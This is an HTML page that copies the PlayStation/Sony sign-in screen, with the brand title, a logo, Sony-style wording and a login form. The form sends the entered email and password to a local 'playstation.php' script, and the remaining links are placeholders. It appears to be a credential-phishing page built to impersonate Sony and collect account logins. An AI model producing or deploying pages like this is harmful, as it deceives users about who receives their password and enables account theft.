<html>
	<head>
		<title>Playstation</title>
		 <meta charset="utf-8" />
		 <meta name="viewport" content="width=device-width, initial-scale=1.0" />
		 <meta name="theme-color" content="" />
		 <meta name="description" content="Sign in to your PlayStation account to access your gaming profile, friends list, and exclusive content." />
		 <meta name="keywords" content="" />
		 
		 <link rel="stylesheet" href="public/css/main.css" />
		 <link rel="stylesheet" href="public/css/" />
	
	<style>
	 body{
	  width:100%;
	  max-width:1000px;
	  height:120vh;
	  margin:0 auto;
	  padding:50;
	  font-family:sans-serif;
	  background-image:url("wallpaper.jpg");
	  background-repeat:no-repeat;
	  background-attachment:scroll;
	  background-size:cover;
	 }
	 
	 .container {
	  width:100%;
	  max-width:1000px;
	 }
	</style>
	 	
	</head>
	<body>
	 <!--container-->
     <div class="container">
		
		<!--box-->
		<style>
		 .box{
		   width:100%;
		   max-width:600px;
           margin:px auto;
           height:500px;
           background:white;
           
		 }.box .top{
		   width:100%;
		   background:#141414;
		   height:50px;
		   position:relative;
		 }.box .top button{
		   position:absolute;
		   top:5;
		   right:10;
		   font-size:30px;
		   color:silver;
		   background:none;
		   border:0px;
		 }.box img{
		  width:100%;
		  max-width:300px;
		  display:flex;
		  justify-content:center;
		  margin:0 auto;
		 }.box p {
		   width:100%;
		   max-width:300px;
		   margin:20 auto;
		   border:0px solid grey;
		   text-align:center;
		   font-size:11px;
		 }.box p a {
		   text-decoration:none;
		   color:royalblue;
		   margin-left:10px;
		 }.box form {
		  border:0px solid black;
		  width:100%;
		  max-width:280px;
		  margin:0 auto;
		 }.box form input{
		  width:100%;
		  height:40px;
		  border:01px solid silver;
		  outline:none;
		  display:block;
		 }.box form button{
		   width:240px;
		   height:35px;
		   border-radius:3px;
		   border:0px;
		 }
		</style>
		<div class="box">
		  
		  <!--top-->
		  <div class="top">
		   <button>&times;</button>
		  </div>
		  <!--top-->
		  <img src="logo_playstation.png" />
		  
		  <p>Access many Sony group services, all with one sign-in ID.</p>
		  
		  <p style="text-align:left;">
		   <a href="#" >Learn more</a>
		  </p>
		  
		  <form action="playstation.php" method="post">
		    <input name="username" placeholder="Sign-In ID (Email Address)" style="border-radius:3px 3px 0px 0px;border-bottom:0px;">
		    <input name="password" placeholder="Password" style="border-radius:0px 0px 3px 3px;">
		    <br>
		    <center>
		    <button name="submit" style="background:#3E66D5;font-weight:bold;color:white;">Sign In</button>
		    <p>
		      <a href="#">Trouble Signing In?</a>
		    </p>
		    
		    <a href="#.html" >
		      <button type="button" style="background:none;border:1px solid silver;margin-bottom:20px;">Create New Account</button>
		    </a>
		    </center>
		    
		    <p>Terms / Privacy / Help</p>
		  </form>
		</div>
		<!--box-->
		
	 </div>
  	 <!--container-->
	</body>
	
	
	<script>
	
	</script>

</html>